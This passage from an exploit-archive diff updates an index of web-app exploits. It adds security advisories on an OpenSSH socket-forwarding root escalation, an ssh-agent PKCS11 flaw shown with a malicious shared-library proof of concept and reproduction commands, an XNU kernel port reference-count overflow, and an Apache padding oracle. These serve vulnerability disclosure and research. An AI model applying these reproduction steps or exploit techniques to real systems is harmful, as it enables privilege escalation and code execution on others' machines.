'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 @@ -19979,7 +19981,7 @@ id,file,description,date,author,platform,type,port 7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0 7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0 -7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0 +7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0 7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0 7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0 @@ -21467,7 +21469,7 @@ id,file,description,date,author,platform,type,port 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 -9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 +9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0 @@ -22127,7 +22129,6 @@ id,file,description,date,author,platform,type,port 10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10834,platforms/php/webapps/10834.txt,"Link Trader - (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 @@ -25043,7 +25044,7 @@ id,file,description,date,author,platform,type,port 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0 -18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0 +18037,platforms/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0 18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 @@ -26842,7 +26843,7 @@ id,file,description,date,author,platform,type,port 24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 -24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0 +24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0 24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0 24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0 @@ -27927,7 +27928,7 @@ id,file,description,date,author,platform,type,port 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 -26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0 +26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps,0 26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - nqgeoip2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - nqgeoip.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 @@ -27940,10 +27941,10 @@ id,file,description,date,author,platform,type,port 26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 -26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 -26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 -26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 -26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 +26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 +26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 +26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 +26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0 26045,platforms/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 @@ -28778,8 +28779,8 @@ id,file,description,date,author,platform,type,port 27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0 27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 -27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 +27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 +27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31305,8 +31306,8 @@ id,file,description,date,author,platform,type,port 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 -30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 -30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 +30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 +30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 @@ -31983,9 +31984,9 @@ id,file,description,date,author,platform,type,port 31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0 31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 -31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 -31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 -31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 +31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 +31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 +31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0 31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0 31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 @@ -32724,9 +32725,9 @@ id,file,description,date,author,platform,type,port 33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0 33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - gmap.php addr Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 -33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0 33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0 @@ -35638,7 +35639,7 @@ id,file,description,date,author,platform,type,port 37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0 37829,platforms/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 -37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0 +37938,platforms/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 @@ -36915,3 +36916,4 @@ id,file,description,date,author,platform,type,port 40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0 +40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0 diff --git a/platforms/linux/local/40962.txt b/platforms/linux/local/40962.txt new file mode 100755 index 000000000..81c8418f5 --- /dev/null +++ b/platforms/linux/local/40962.txt @@ -0,0 +1,26 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 + +This issue affects OpenSSH if privilege separation is disabled (config option +UsePrivilegeSeparation=no). While privilege separation is enabled by default, it +is documented as a hardening option, and therefore disabling it should not +directly make a system vulnerable. + +OpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation +is disabled, then on the server side, the forwarding is handled by a child of +sshd that has root privileges. For TCP server sockets, sshd explicitly checks +whether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if +so, requires the client to authenticate as root. However, for UNIX domain +sockets, no such security measures are implemented. + +This means that, using "ssh -L", an attacker who is permitted to log in as a +normal user over SSH can effectively connect to non-abstract unix domain sockets +with root privileges. On systems that run systemd, this can for example be +exploited by asking systemd to add an LD_PRELOAD environment variable for all +following daemon launches and then asking it to restart cron or so. The attached +exploit demonstrates this - if it is executed on a system with systemd where +the user is allowed to ssh to his own account and where privsep is disabled, it +yields a root shell. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip diff --git a/platforms/linux/remote/40963.txt b/platforms/linux/remote/40963.txt new file mode 100755 index 000000000..826284eab --- /dev/null +++ b/platforms/linux/remote/40963.txt @@ -0,0 +1,33 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 + +The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded. + +This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine. + +To reproduce the issue, first create a library that executes some command when it is loaded: + +$ cat evil_lib.c +#include +__attribute__((constructor)) static void run(void) { + // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, + // prevent recursion through system() + unsetenv("LD_PRELOAD"); + unsetenv("LD_LIBRARY_PATH"); + system("id > /tmp/test"); +} +$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall + +Connect to another machine using "ssh -A". Then, on the remote machine: + +$ ssh-add -s [...]/evil_lib.so +Enter passphrase for PKCS#11: [just press enter here] +SSH_AGENT_FAILURE +Could not add card: [...]/evil_lib.so + +At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent: + +$ cat /tmp/test +uid=1000(user) gid=1000(user) groups=[...] + + +Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h \ No newline at end of file diff --git a/platforms/multiple/dos/40955.txt b/platforms/multiple/dos/40955.txt index 97bdd40fb..4dccba7d9 100755 --- a/platforms/multiple/dos/40955.txt +++ b/platforms/multiple/dos/40955.txt @@ -1,16 +1,153 @@ -Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930 +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926 -IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return -kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via -IOConnectCallAsyncMethod. +mach ports are really struct ipc_port_t's in the kernel; this is a reference-counted object, +ip_reference and ip_release atomically increment and decrement the 32 bit io_references field. -If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that -they did take ownership and won't release it's reference on the port. This leads to a reference count leak. +Unlike OSObjects, ip_reference will allow the reference count to overflow, however it is still 32-bits +so without either a lot of physical memory (which you don't have on mobile or most desktops) or a real reference leak +this isn't that interesting. -See the previous bug for more in-depth discussion. +** MIG and mach message rights ownership ** -This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable. -This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF. +ipc_kobject_server in ipc_kobject.c is the main dispatch routine for the kernel MIG endpoints. When userspace sends a +message the kernel will copy in the message body and also copy in all the message rights; see for example +ipc_right_copyin in ipc_right.c. This means that by the time we reach the actual callout to the MIG handler any port rights +contained in a request have had their reference count increased by one. + +After the callout we reach the following code (still in ipc_kobject_server): + + if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) { + // The server function is responsible for the contents + // of the message. The reply port right is moved + // to the reply message, and we have deallocated + // the destination port right, so we just need + // to free the kmsg. + ipc_kmsg_free(request); + } else { + // The message contents of the request are intact. + // Destroy everthing except the reply port right, + // which is needed in the reply message. + request->ikm_header->msgh_local_port = MACH_PORT_NULL; + ipc_kmsg_destroy(request); + } + +If the MIG callout returns success, then it means that the method took ownership of *all* of the rights contained in the message. +If the MIG callout returns a failure code then the means the method took ownership of *none* of the rights contained in the message. + +ipc_kmsg_free will only destroy the message header, so if the message had any other port rights then their reference counts won't be +decremented. ipc_kmsg_destroy on the other hand will decrement the reference counts for all the port rights in the message, even those +in port descriptors. + +If we can find a MIG method which returns KERN_SUCCESS but doesn't in fact take ownership of any mach ports its passed (by for example +storing them and dropping the ref later, or using them then immediately dropping the ref or passing them to another method which takes +ownership) then this can lead to us being able to leak references. + +** indirect MIG methods ** + +Here's the MIG request structure generated for io_service_add_notification_ool_64: + + typedef struct { + mach_msg_header_t Head; + // start of the kernel processed data + mach_msg_body_t msgh_body; + mach_msg_ool_descriptor_t matching; + mach_msg_port_descriptor_t wake_port; + // end of the kernel processed data + NDR_record_t NDR; + mach_msg_type_number_t notification_typeOffset; // MiG doesn't use it + mach_msg_type_number_t notification_typeCnt; + char notification_type[128]; + mach_msg_type_number_t matchingCnt; + mach_msg_type_number_t referenceCnt; + io_user_reference_t reference[8]; + mach_msg_trailer_t trailer; + } Request __attribute__((unused)); + + +This is an interesting method as its implementation actually calls another MIG handler: + + + static kern_return_t internal_io_service_add_notification_ool( + ... + kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching ); + data = CAST_DOWN(vm_offset_t, map_data); + + if( KERN_SUCCESS == kr) { + // must return success after vm_map_copyout() succeeds + // and mig will copy out objects on success + *notification = 0; + *result = internal_io_service_add_notification( master_port, notification_type, + (char *) data, matchingCnt, wake_port, reference, referenceSize, client64, notification ); + vm_deallocate( kernel_map, data, matchingCnt ); + } + + return( kr ); + } + + +and internal_io_service_add_notification does this: + + + static kern_return_t internal_io_service_add_notification( + ... + if( master_port != master_device_port) + return( kIOReturnNotPrivileged); + + do { + err = kIOReturnNoResources; + + if( !(sym = OSSymbol::withCString( notification_type ))) + err = kIOReturnNoResources; + + if (matching_size) + { + dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching, matching_size)); + } + else + { + dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching)); + } + + if (!dict) { + err = kIOReturnBadArgument; + continue; + } + ... + } while( false ); + + return( err ); + + +This inner function has many failure cases (wrong kernel port, invalid serialized data) which we can easily trigger and these error paths lead +to this inner function not taking ownership of the wake_port argument. However, MIG will only see the return value of the outer internal_io_service_add_notification_ool +which will always return success if we pass a valid ool memory descriptor. This violates ipc_kobject_server's ownership model where success means ownership +was taken of all rights, not just some. + +What this leads to is actually quite a nice primitive for constructing an ipc_port_t reference count overflow without leaking any memory. + +If we call io_service_add_notification_ool with a valid ool descriptor, but fill it with data that causes OSUnserializeXML to return an error then +we can get that memory freed (via the vm_deallocate call above) but the reference on the wake port will be leaked since ipc_kmsg_free will be called, not +ipc_kmsg_destroy. + +If we send this request 0xffffffff times we can cause a ipc_port_t's io_references field to overflow to 0; the next time it's used the ref will go 0 -> 1 -> 0 +and the object will be free'd but we'll still have a dangling pointer in our process's ports table. + +As well as being a regular kernel UaF this also gives us the opportunity to do all kinds of fun mach port related logic attacks, eg getting send rights to +other task's task ports via our dangling ipc_port_t pointer. + +** practicality ** + +On my 4 year old dual core MBA 5,2 running with two threads this PoC takes around 8 hours after which you should see a kernel panic indicative of a UaF. +Note that there are no resources leaks involved here so you can run it even on very constrained systems like an iPhone and it will work fine, +albeit a bit slowly :) + +This code is reachable from all sandboxed environments. + +** fixes ** + +One approach to fixing this issue would be to do something similar to OSObjects which use a saturating reference count and leak the object if the reference count saturates + +I fear there are a great number of similar issues so just fixing this once instance may not be enough. Proof of Concept: diff --git a/platforms/multiple/webapps/40961.py b/platforms/multiple/webapps/40961.py new file mode 100755 index 000000000..496ebc502 --- /dev/null +++ b/platforms/multiple/webapps/40961.py @@ -0,0 +1,376 @@ +''' +Advisory: Padding Oracle in Apache mod_session_crypto + +During a penetration test, RedTeam Pentesting discovered a Padding +Oracle vulnerability in mod_session_crypto of the Apache web server. +This vulnerability can be exploited to decrypt the session data and even +encrypt attacker-specified data. + + +Details +======= + +Product: Apache HTTP Server mod_session_crypto +Affected Versions: 2.3 to 2.5 +Fixed Versions: 2.4.25 +Vulnerability Type: Padding Oracle +Security Risk: high +Vendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt +Advisory Status: published +CVE: CVE-2016-0736 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736 + + +Introduction +============ + +The module mod_session_crypto of the Apache HTTP Server can be used in +conjunction with the modules mod_session and mod_session_cookie to store +session data in an encrypted cookie within the users' browsers. This +avoids server-side session state so that incoming HTTP requests can be +easily distributed amongst a number of application web servers which do +not need to share session state. + + +More Details +============ + +The module mod_session_crypto uses symmetric cryptography to encrypt and +decrypt session data and uses mod_session to store the encrypted data in +a cookie (usually called "session") within the user's browser. The +decrypted session is then made available to the application in an +environment variable (in case of a CGI script) or in a custom HTTP +request header. The application can add a custom HTTP response header +(usually "X-Replace-Session") which instructs the HTTP server to replace +the session's content with the value of the header. Detailed +instructions to set up mod_session and mod_session_crypto can be found +in the documentation: +https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples + +The module mod_session_crypto is configured to use either 3DES or AES +with various key sizes, defaulting to AES256. Encryption is handled by +the function "encrypt_string": + +modules/session/mod_session_crypto.c +------------------------------------------------------------------------ +/** + * Encrypt the string given as per the current config. + * + * Returns 